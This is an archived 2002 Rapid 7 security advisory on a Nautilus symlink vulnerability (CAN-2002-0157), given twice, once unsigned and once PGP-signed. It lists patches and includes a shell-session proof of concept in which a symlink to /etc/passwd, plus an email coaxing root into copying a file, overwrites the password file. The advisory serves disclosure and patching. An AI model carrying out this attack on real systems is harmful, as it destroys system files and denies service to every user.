[ My mail client, Mozilla 1.0 RC1, mangles this advisory and ruins the
signature. See attached file for signed version.]
_______________________________________________________________________
Rapid 7, Inc. Security Advisory
Visit http://www.rapid7.com/ to download NeXpose(tm), our
advanced vulnerability scanner. Linux and Windows 2000
versions are available now!
_______________________________________________________________________
Rapid 7 Advisory R7-0003: Nautilus Symlink Vulnerability
Published: 05/02/2002
Revision: 1.0
CVE ID: CAN-2002-0157
Bugtraq ID: 4373
1. Affected system(s):
KNOWN VULNERABLE:
o Nautilus 1.0.4
Apparently NOT VULNERABLE:
2. Summary
Nautilus is a graphical shell for GNOME. It contains a vulnerability
which would allow a malicious user to mount a symlink attack to
overwrite
another user's files.
3. Vendor status and information
Nautilus
Eazel, Inc.
http://nautilus.eazel.com/
The Nautilus team was notified on 03/26/2002.
4. Solution
Upgrade to the latest version of Nautilus, available at
http://cvs.gnome.org/lxr/source/nautilus/, or apply the appropriate
patch:
RedHat 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm
i386:
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm
ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm
Slackware:
ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/
5. Detailed analysis
When copying files from one directory to another, Nautilus creates a
small (88+ bytes) XML file called '.nautilus-metafile.xml' in the
target
directory. It does not check if a symlink with the same name already
exists there, and blindly writes XML data to it. The following example
shows how to cause a system-wide denial of service attack with this
vulnerability:
[jdog@imisshogs jdog]$ pwd
/home/jdog
[jdog@imisshogs jdog]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...snip...]
jdog:x:500:500::/home/jdog:/bin/bash
[jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
[jdog@imisshogs jdog]$ mail root
Subject: Yo.
Could you please copy "creepy-in-new-york.doc" to my home directory
(/home/jdog)? Thanks.
- Joe
Cc:
[jdog@imisshogs jdog]$ sleep 86400
[jdog@imisshogs jdog]$ ls -l *.doc
-rw-r--r-- 1 root root 13 Mar 24 18:09
creepy-in-new-york.doc
[jdog@imisshogs jdog]$ cat /etc/passwd
<?xml version="1.0"?>
<directory>
<file name="creepy-in-new-york.doc" icon_position="55,105"/>
</directory>
[jdog@imisshogs jdog]$
6. Contact Information
Rapid 7 Security Advisories
Email: advisoryat_private
Web: http://www.rapid7.com/
Phone: +1 (212) 558-8700
7. Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory in electronic media
only, providing that no changes are made and that the copyright
notices and disclaimers remain intact. This advisory may not be
printed or distributed in non-electronic media without the
express written permission of Rapid 7, Inc.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Rapid 7, Inc. Security Advisory
Visit http://www.rapid7.com/ to download NeXpose(tm), our
advanced vulnerability scanner. Linux and Windows 2000
versions are available now!
_______________________________________________________________________
Rapid 7 Advisory R7-0003: Nautilus Symlink Vulnerability
Published: 05/02/2002
Revision: 1.0
CVE ID: CAN-2002-0157
Bugtraq ID: 4373
1. Affected system(s):
KNOWN VULNERABLE:
o Nautilus 1.0.4
Apparently NOT VULNERABLE:
2. Summary
Nautilus is a graphical shell for GNOME. It contains a vulnerability
which would allow a malicious user to mount a symlink attack to overwrite
another user's files.
3. Vendor status and information
Nautilus
Eazel, Inc.
http://nautilus.eazel.com/
The Nautilus team was notified on 03/26/2002.
4. Solution
Upgrade to the latest version of Nautilus, available at
http://cvs.gnome.org/lxr/source/nautilus/, or apply the appropriate
patch:
RedHat 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm
i386:
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm
ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm
Slackware:
ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/
5. Detailed analysis
When copying files from one directory to another, Nautilus creates a
small (88+ bytes) XML file called '.nautilus-metafile.xml' in the target
directory. It does not check if a symlink with the same name already
exists there, and blindly writes XML data to it. The following example
shows how to cause a system-wide denial of service attack with this
vulnerability:
[jdog@imisshogs jdog]$ pwd
/home/jdog
[jdog@imisshogs jdog]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...snip...]
jdog:x:500:500::/home/jdog:/bin/bash
[jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
[jdog@imisshogs jdog]$ mail root
Subject: Yo.
Could you please copy "creepy-in-new-york.doc" to my home directory
(/home/jdog)? Thanks.
- Joe
Cc:
[jdog@imisshogs jdog]$ sleep 86400
[jdog@imisshogs jdog]$ ls -l *.doc
-rw-r--r-- 1 root root 13 Mar 24 18:09 creepy-in-new-york.doc
[jdog@imisshogs jdog]$ cat /etc/passwd
<?xml version="1.0"?>
<directory>
<file name="creepy-in-new-york.doc" icon_position="55,105"/>
</directory>
[jdog@imisshogs jdog]$
6. Contact Information
Rapid 7 Security Advisories
Email: advisoryat_private
Web: http://www.rapid7.com/
Phone: +1 (212) 558-8700
7. Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory in electronic media
only, providing that no changes are made and that the copyright
notices and disclaimers remain intact. This advisory may not be
printed or distributed in non-electronic media without the
express written permission of Rapid 7, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE80XI+cL76DCfug6wRAjlQAJ0RnxZ7j/ZAHj2gwYk2roTsuGZrXgCfX2HE
agX4Q4yXM22ZTN0Tm0SVH3U=
=N4z5
-----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Thu May 02 2002 - 14:54:29 PDT